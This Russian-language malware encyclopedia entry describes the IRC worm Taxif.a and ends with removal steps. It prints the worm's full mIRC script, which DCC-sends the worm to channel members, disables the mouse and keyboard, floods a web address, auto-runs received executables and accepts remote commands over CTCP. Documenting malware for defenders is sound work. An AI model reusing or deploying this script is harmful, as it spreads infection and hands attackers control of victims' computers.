IRC-Worm.Win32.Taxif.a

Материал из Total Malware Info

Перейти к: навигация, поиск

IRC-Worm_Win32_Taxif.a Червь распространяющий себя через IRC. Является приложением Windows (PE-EXE файл). Имеет размер 8 192 байт.

Инсталляция

Копирует свой исполняемый файл как: 

c:\autoexec.pif
c:\recycled\taxifolia.exe

Деструктивная активность

Данный червь распространяется с использованием программы mIRC. Записывает следующий текст в файл mirc.ini: 

[rfiles]
n2=taxifolia.fs

Поиск файла ведется в следующих папках: 

c:\mirc
c:\mirc32
c:\progra~1\mirc
c:\progra~1\mirc32

Создает файл “taxifolia.fs” в папке c файлом mirc.ini и записывает в него следующие строки: 

# TAXIFOLIA, courtesy of mandragoreFS
on 1:start:{
  .fsend on
  .sreq +m auto
  .ajinvite on
  .run -n c:\command.com /c copy c:\autoexec.pif c:\recycled\taxifolia.exe
  .titlebar -=] 0wned by taxifolia, courtesy of mandragoreFS ! [=-
}
on 1:connect:{
  .run -n rundll32.exe mouse,disable
  .run -n rundll32.exe keyboard,disable
  .window -dok +e @mIRC32 100 100 400 100
  .aline @mirc32 This is the automatic update feature.
  .aline @mirc32 It takes up to few minutes.
  .aline @mirc32 If your computer slows down, this is normal.
  .aline @mirc32 DO NOT REBOOT !
  .showmirc -t
  .join #warez
  .join #sexe
  .list
}
on 1:disconnect:.server
on 1:join:#:{
  .join $chan
  .updatenl
  if ($nick($chan,0)==1) {halt}
  if $nick == $me {
    %i=0
    :next
    inc %i
    if (%i == $nick($chan,0)+1) {halt}
    .dcc send $nick($chan,%i)
    .whois $nick($chan,%i)
    goto next
  }
  else {.dcc send $nick c:\recycled\taxifolia.exe}
}
raw 319:*:.join $3-
raw 322:*:.join $1-
on 1:start:.sockopen x www.macafee.com 80
on 1:sockopen:x:.sockwrite -n x you suxx
on 1:sockwrite:x:.sockwrite -n x you suxx
on 1:sockclose:x:.sockopen x www.macafee.com 80
on 1:text:*virus*:*:.ignore $nick | .part $chan
on 1:text:*file*:?:.fserve $nick 100 c:\
on 1:filercvd:*.exe,*.com,*.vbs:.run $filename
ctcp 1:run:?:/run $1-

Данный скрипт расссылает исполняемый файл червя используя сервис DCC всем присоединяющимся к каналу клиентам. Скрипт так же отключает мышь и клавиатуру, когда пользователь присоединяется к IRC серверу и посылает пакеты с сообщением “you suxx” на адрес www.macafee.com:80

Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

  1. При помощи ("Диспетчера задач") завершить процесс червя.
  2. Удалить оригинальный файл червя (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
  3. Удалить файлы:
    4. c:\autoexec.pif
c:\recycled\taxifolia.exe
  4. Удалить файл taxifolia.fs из папки с установленным mIRC.
Источник — «http://www.totalmalwareinfo.com/rus/IRC-Worm.Win32.Taxif.a»
Язык
Видеокурс
Computer and Internet Security Video Tutorials
© 2011 ООО «Лаборатория дизайн и тест». Все права защищены.